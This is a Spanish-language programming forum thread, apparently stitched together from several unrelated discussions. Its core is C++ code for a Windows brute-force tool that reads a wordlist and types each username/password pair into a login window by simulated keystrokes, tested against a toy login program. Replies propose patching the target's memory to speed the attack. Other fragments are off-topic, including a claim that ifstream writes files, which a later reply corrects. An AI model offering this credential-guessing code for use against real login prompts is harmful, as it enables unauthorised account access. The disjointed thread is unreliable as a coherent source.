Mensajes

quieres pasar de

(4+3*(4-5)*(7-8))  a esto

+(4,*(*(3,-(4,5)),-(7,8))
(por ejemplo)????

[VICTIMA:]

Ya encontre el error, me da vergüenza decir donde estaba el error 

error de logica en el codigo victima...

bueno aqui os dejo el codigo por si quereis hecharle un vistazo:

VICTIMA:

Código (cpp) [Seleccionar] Expandir

#include <iostream>
#include <string>
using namespace std;
   
const string usu = "aaa";
const string pas = "cab";

int main(){
string USU;
string PAS;
    do{
system("title LOGIN");
cout << "Usuario: ";
cin >> USU;
cout << "Contraseña: ";
cin >> PAS;
cin.clear();
    }while(usu!=USU || pas!=PAS);
if(usu==USU && pas==PAS)
cout<<"Contraseña CORRECTA"<<endl;
    return 0;
}


ATAQUE:

Código (cpp) [Seleccionar] Expandir

#include <iostream>
#include <fstream>
#include <string>
#include <Windows.h>
using namespace std;

bool enviar(string login, string pass);

int main(){
const HANDLE Consola = GetStdHandle(STD_OUTPUT_HANDLE);
string login, pswd;
ifstream pass("dico.txt");
ifstream user("dico.txt");
if(pass.is_open() && user.is_open()){
bool seguir=true;
while(!user.eof() && seguir){
getline(user,login,'\n');
while(!pass.eof() && seguir){
getline(pass,pswd,'\n');
SetForegroundWindow((HWND)Consola);
seguir=enviar(login,pswd);
Sleep(300);
}
}

}
system("pause");
return 0;
}

bool enviar(string login, string pass){
HWND hCalc = FindWindow(NULL, TEXT("LOGIN"));//Obtenemos el Handle de la ventana
if (hCalc != 0){
cout<<"User: "<<login<<endl;
cout<<"Pass: "<<pass<<endl;
SetForegroundWindow(hCalc);

/*enviar login*/
for(register int i=0;i<login.size();i++){
keybd_event((BYTE)VkKeyScan(login[i]), 0, 0, 0);
keybd_event((BYTE)VkKeyScan(login[i]), 0, 2, 0);
}
keybd_event(VK_RETURN, 0, 0, 0); //Pulsamos enter
keybd_event(VK_RETURN, 0, 2, 0); //Levantamos enter

/*enviar pass*/
for(register int i=0;i<pass.size();i++){
keybd_event((BYTE)VkKeyScan(pass[i]), 0, 0, 0);
keybd_event((BYTE)VkKeyScan(pass[i]), 0, 2, 0);
}
keybd_event(VK_RETURN, 0, 0, 0); //Pulsamos enter
keybd_event(VK_RETURN, 0, 2, 0); //Levantamos enter

return true;
}
else
return false;
}




en la consola de ataque, el ultimo user y pass son los correctos...

solo un pequeño detalle, si en el codigo de la victima, el programa no se cierra, el programa atacante sigue poniendo el users y pass en la consola. Por lo tanto no se podria saber cual es el codigo y el users

¡Buenas!

No se si se podria hacer de esta forma o no. Durante un tiempo estuve trasteando con la ingenieria inversa. Las funciones de lectura, si leen cadenas, necesitan la diereccion de memoria de la cadena en la que almacenan datos. Esta parte de la memoria supongo que sera de lectura/escritura. Lo que podrias intentar es parchear la lectura de los datos, para escribir la cadena desde fuera del programa e introducir un salto a la parte en la que se comprueba si el user/pass es correcto, y asi hasta que encuentres un par valido... Asi te olvidas de las APIs y el programa es mas portable... Pero ya te digo, solo es una idea.

¡Saludos!

si, eso tambien lo habia pensado, desensamblar el programa victima, ver en que direccion de memoria se guardan los datos, y a partir de ahi crear el programa BruteForce, e ir escribiendo en esas zonas de memoria..., tengo que probarlo

pero como escribir en esas zonas de memoria?

saludos

Creo que te falta un cin.clear() en el código de la víctima.

Saludos.

no me ha funcionado, sigue igual :S

¿Por qué no haces la prueba con tuberías?, es decir, que el programa espere el user y el password de la entrada estándar y se lo mandas con un comando.

type words | programa
ó
cat words | programa

para programar "pipes" o "tuberias" hay que modificar el programa Victima, para establecer una comunicacion,
y lo que se quiere hacer es que se pueda enviar datos a otra consola, sin conocer el codigo que tiene... lo de las consolas es solo para hacer la prueba...

saludos

[Victima]

Bueno aqui tengo un codigo basandome en lo que dijo Khronos14 pero no funciona muy bien, los datos se envian correctamente pero se cierra la consola que pide el login y contraseña:

Victima

Código (cpp) [Seleccionar] Expandir

#include <iostream>
#include <string>
using namespace std;
   
const string usu = "aaa";
const string pas = "cab";

int main(){
string USU;
string PAS;
    do{
system("title LOGIN");
cout << "Usuario: ";
cin >> USU;
cout << "Password: ";
cin >> PAS;
    }while(usu!=USU && pas!=PAS);
    return 0;
}


BruteForce

Código (cpp) [Seleccionar] Expandir

#include <iostream>
#include <fstream>
#include <string>
#include <Windows.h>
using namespace std;

bool enviar(string login, string pass);

int main(){
const HANDLE Consola = GetStdHandle(STD_OUTPUT_HANDLE);
string login, pswd;
ifstream pass("dico.txt");
ifstream user("dico.txt");
if(pass.is_open() && user.is_open()){
bool seguir=true;
while(!user.eof() && seguir){
user>>login;
while(!pass.eof() && seguir){
pass>>pswd;
SetForegroundWindow((HWND)Consola);
seguir=enviar(login,pswd);
Sleep(1000);
}
}

}
system("pause");
return 0;
}

bool enviar(string login, string pass){
HWND hCalc = FindWindow(NULL, TEXT("LOGIN"));//Obtenemos el Handle de la ventana de la calculadora
if (hCalc != 0){
cout<<"User: "<<login<<endl;
cout<<"Pass: "<<pass<<endl;
SetForegroundWindow(hCalc);

/*enviar pass*/
for(register int i=0;i<login.size();i++){
keybd_event((BYTE)VkKeyScan(login[i]), 0, 0, 0);
keybd_event((BYTE)VkKeyScan(login[i]), 0, 2, 0);
}
keybd_event(VK_RETURN, 0, 0, 0); //Pulsamos enter
keybd_event(VK_RETURN, 0, 2, 0); //Levantamos enter

/*enviar login*/
for(register int i=0;i<pass.size();i++){
keybd_event((BYTE)VkKeyScan(pass[i]), 0, 0, 0);
keybd_event((BYTE)VkKeyScan(pass[i]), 0, 2, 0);
}
keybd_event(VK_RETURN, 0, 0, 0); //Pulsamos enter
keybd_event(VK_RETURN, 0, 2, 0); //Levantamos enter

return true;
}
else
return false;
}


no se en que falla...

[Khronos14]

Khronos14  de lujo

Con sockets no?Bueno eso fue lo que habimos dicho en el proyecto, además lo intente y funcionó, intentalo con sockets  

los dos programas son independientes el uno del otro. el programa que pide la contraseña y el login no esta programado para conectarse a ningun socket ni esta programado para comunicar por pipes. Son programas a parte...

esto es una de las condiciones: entonces a partir de esto, como se podria conseguir ?

[j1[30];]

bueno para que te funcione en el Visual C++ hay que cambiar unas cosas:

Pon estas librerias:

Código (cpp) [Seleccionar] Expandir

#include <iostream>
#include <conio.h>
#include <string>
#include <time.h>
#include <Windows.h>

añade esto arriba:

Código (cpp) [Seleccionar] Expandir

using namespace std;

const HANDLE Consola = GetStdHandle(STD_OUTPUT_HANDLE);

void textcolor(int numColor){SetConsoleTextAttribute(Consola, numColor);}
void gotoxy(int x, int y) {
COORD coord;
coord.X = x;
coord.Y = y;
SetConsoleCursorPosition(GetStdHandle(STD_OUTPUT_HANDLE), coord);
}


remplaza

Código [Seleccionar] Expandir

clrscr();
por

Código [Seleccionar] Expandir

system("cls");


PD: despues de todos estos cambios me daba un error en j1[30]; si te da ese error, busca y remplaza j1 por otro nombre.


saludos

[ifstream]

Eso que dices dany, no es cierto.
El fichero lo quiere como lectura, asi que debe ser ofstream. ifstream se usa para escritura, y no es el caso.

ifstream sirve para leer de un archivo (y es exactamente lo que quiere)
ofstream sirve para escribir en un archivo.

El problema, probablemente, es que no está inicializada la variable 'i'.

Esa es la solucion .

[ksiksi]

ksiksi la cadena al final tiene que tener siempre 29 digitos?